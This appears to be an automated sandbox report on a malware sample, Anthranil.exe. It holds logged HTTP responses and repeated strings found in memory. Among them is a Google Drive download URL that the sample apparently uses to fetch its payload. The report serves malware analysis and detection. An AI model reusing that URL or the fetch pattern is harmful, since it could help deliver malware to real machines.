1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR2QAmeHHnKsM1SzUUdkRWxTj6Owy4_t9bfFzuMkuoe92I_zo3QVOCae77XNB2agFfFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:05 GMTContent-Security-Policy: script-src 'nonce-FMuHsHtv33afmVkPvPyEWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Iy_Dwv3OzE1-NvGJHrgIpFtOHAhqeGkRprAyrX9rFMxK_EJDQJyXpKxJxFkllbbrs2uDINI4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:07 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-yebyOCxsHm-fw_6IbCDaUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTkcsJonDknn8WKqD6Xw13NFJXQMMMaMddybhhs52LvAol18cfi-EJzIDTQs6Qpa_R3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IiGMfMYpvzdZ5uW2MfiawQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTZlFIqQx6lCF-u26JcAzTAF9Rkf_PAgvC82luLTwp2jnX7smWktigueoDKWbuJCEvI1vcIMZMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3T_8F_uCxaOzKx65EJOp1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQor1AMDJBUT27l7U8xZmGPGFtthlOqL_2FHP4CKwhb74vZ0dv2WL4bEvPubnB75BKoE_b911MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:14 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WTsq79d1HfDmzx-pdQ1a_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: AM983ebb5F.exe, Anthranil.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: Anthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: Anthranil.exe, 00000006.00000001.2413832004.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: Anthranil.exe, 00000006.00000003.2753950907.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=d
    Source: Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/%
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/&
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2719480758.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707500476.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/.
    Source: Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592673124.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1&0
    Source: Anthranil.exe, 00000006.00000003.2672365958.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2661358131.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:)
    Source: Anthranil.exe, 00000006.00000003.2777342764.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/crosoft
    Source: Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d.google.com
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ds-cn.com
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download2
    Source: Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2777342764.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2753950907.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=downloadC
